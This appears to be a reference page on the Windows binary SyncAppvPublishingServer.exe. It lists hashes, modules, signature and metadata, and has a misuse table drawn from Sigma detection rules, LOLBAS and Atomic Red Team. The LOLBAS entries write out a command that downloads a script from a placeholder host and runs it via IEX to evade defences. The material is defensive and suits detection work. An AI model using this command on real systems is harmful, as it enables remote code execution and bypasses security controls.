SyncAppvPublishingServer.exe

  • File Path: C:\Windows\system32\SyncAppvPublishingServer.exe
  • Description: Microsoft Application Virtualization Sync Utility

Hashes

Type Hash
MD5 3C291419F60CDF9C2E4E19AD89944FA3
SHA1 0B6D803C876B6313CE08A79B2A98F6E3BAC97689
SHA256 53A78D6C3D05552E616897712D0D16BF14D0030AF2BB367841B6AECC883FF218
SHA384 D7A55317A767950F5682573888B9156EFCB9F7BD73D44A61FAD253B6BBCB9785E56AE0F8B87009CEF5047091D6F61562
SHA512 587B9BC171988CB41E3A0B19AB7A242DB23D070F70429F8061D095C1CB142498E8A6239004055C83439E6AD4EE52735F9BF97C3145622D0CF71021402005A4D2
SSDEEP 768:G6FyyphiE9jr4jwmp3PwysQdwRUuKs27cRg1Pb7aJGgZ:G6t9jrN8P3sQOUwSuYPSJGI
IMP 1EC41853BAB928648731DDAB143F3159
PESHA1 EB4A6346C6342096471F65E6402E29B99ECEC8CF
PE256 960CDC3E9C992799BF8FB7A29EB592C492079DA0F5CE562BA0261C509E4D1E08

Runtime Data

Loaded Modules:

Path
C:\Windows\System32\combase.dll
C:\Windows\System32\GDI32.dll
C:\Windows\System32\gdi32full.dll
C:\Windows\System32\KERNEL32.DLL
C:\Windows\System32\KERNELBASE.dll
C:\Windows\System32\msvcp_win.dll
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\ole32.dll
C:\Windows\System32\RPCRT4.dll
C:\Windows\System32\SHELL32.dll
C:\Windows\system32\SyncAppvPublishingServer.exe
C:\Windows\System32\ucrtbase.dll
C:\Windows\System32\USER32.dll
C:\Windows\System32\win32u.dll

Signature

  • Status: Signature verified.
  • Serial: 33000002EC6579AD1E670890130000000002EC
  • Thumbprint: F7C2F2C96A328C13CDA8CDB57B715BDEA2CBD1D9
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: syncappvpublishingserver.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.19041.1320 (WinBuild.160101.0800)
  • Product Version: 10.0.19041.1320
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: Unknown

File Similarity (ssdeep match)

File Score
C:\Windows\system32\SyncAppvPublishingServer.exe 49
C:\Windows\system32\SyncAppvPublishingServer.exe 49

Possible Misuse

The following table contains possible examples of SyncAppvPublishingServer.exe being misused. While SyncAppvPublishingServer.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma powershell_syncappvpublishingserver_exe.yml title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction DRL 1.0
sigma powershell_syncappvpublishingserver_exe.yml description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. DRL 1.0
sigma powershell_syncappvpublishingserver_exe.yml - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ DRL 1.0
sigma powershell_syncappvpublishingserver_exe.yml - 'SyncAppvPublishingServer.exe' DRL 1.0
sigma process_creation_syncappvpublishingserver_exe.yml title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction DRL 1.0
sigma process_creation_syncappvpublishingserver_exe.yml description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. DRL 1.0
sigma process_creation_syncappvpublishingserver_exe.yml - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ DRL 1.0
sigma process_creation_syncappvpublishingserver_exe.yml Image\|endswith: '\SyncAppvPublishingServer.exe' DRL 1.0
sigma image_load_in_memory_powershell.yml - '\syncappvpublishingserver.exe' DRL 1.0
sigma posh_pm_syncappvpublishingserver_exe.yml title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction DRL 1.0
sigma posh_pm_syncappvpublishingserver_exe.yml description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. DRL 1.0
sigma posh_pm_syncappvpublishingserver_exe.yml - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ DRL 1.0
sigma posh_pm_syncappvpublishingserver_exe.yml ContextInfo\|contains: 'SyncAppvPublishingServer.exe' DRL 1.0
sigma posh_ps_syncappvpublishingserver_exe.yml title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction DRL 1.0
sigma posh_ps_syncappvpublishingserver_exe.yml description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. DRL 1.0
sigma posh_ps_syncappvpublishingserver_exe.yml - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ DRL 1.0
sigma posh_ps_syncappvpublishingserver_exe.yml ScriptBlockText\|contains: 'SyncAppvPublishingServer.exe' DRL 1.0
sigma proc_creation_win_syncappvpublishingserver_execute_powershell.yml title: SyncAppvPublishingServer Execute Arbitrary PowerShell Code DRL 1.0
sigma proc_creation_win_syncappvpublishingserver_execute_powershell.yml description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. DRL 1.0
sigma proc_creation_win_syncappvpublishingserver_execute_powershell.yml - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ DRL 1.0
sigma proc_creation_win_syncappvpublishingserver_execute_powershell.yml Image\|endswith: '\SyncAppvPublishingServer.exe' DRL 1.0
sigma proc_creation_win_syncappvpublishingserver_vbs_execute_powershell.yml title: SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code DRL 1.0
sigma proc_creation_win_syncappvpublishingserver_vbs_execute_powershell.yml description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs DRL 1.0
sigma proc_creation_win_syncappvpublishingserver_vbs_execute_powershell.yml - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ DRL 1.0
sigma proc_creation_win_syncappvpublishingserver_vbs_execute_powershell.yml - '\SyncAppvPublishingServer.vbs' DRL 1.0
LOLBAS Syncappvpublishingserver.yml Name: SyncAppvPublishingServer.exe  
LOLBAS Syncappvpublishingserver.yml - Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') \| IEX"  
LOLBAS Syncappvpublishingserver.yml Usecase: Use SyncAppvPublishingServer as a Powershell host to execute Powershell code. Evade defensive counter measures  
LOLBAS Syncappvpublishingserver.yml - Path: C:\Windows\System32\SyncAppvPublishingServer.exe  
LOLBAS Syncappvpublishingserver.yml - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe  
LOLBAS Syncappvpublishingserver.yml - IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed  
LOLBAS Syncappvpublishingserver.yml Name: Syncappvpublishingserver.vbs  
LOLBAS Syncappvpublishingserver.yml - Command: SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') \| IEX"  
LOLBAS Syncappvpublishingserver.yml - Path: C:\Windows\System32\SyncAppvPublishingServer.vbs  
atomic-red-team index.md - Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team T1216.md - Atomic Test #1 - SyncAppvPublishingServer Signed Script PowerShell Command Execution MIT License. © 2018 Red Canary
atomic-red-team T1216.md ## Atomic Test #1 - SyncAppvPublishingServer Signed Script PowerShell Command Execution MIT License. © 2018 Red Canary
atomic-red-team T1216.md Executes the signed SyncAppvPublishingServer script with options to execute an arbitrary PowerShell command. MIT License. © 2018 Red Canary
atomic-red-team T1216.md C:\windows\system32\SyncAppvPublishingServer.vbs “\n;#{command_to_execute}” MIT License. © 2018 Red Canary
atomic-red-team T1218.md - Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code MIT License. © 2018 Red Canary
atomic-red-team T1218.md ## Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code MIT License. © 2018 Red Canary
atomic-red-team T1218.md Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10. MIT License. © 2018 Red Canary
atomic-red-team T1218.md SyncAppvPublishingServer.exe “n; #{powershell_code}” MIT License. © 2018 Red Canary

MIT License. Copyright (c) 2020-2021 Strontic.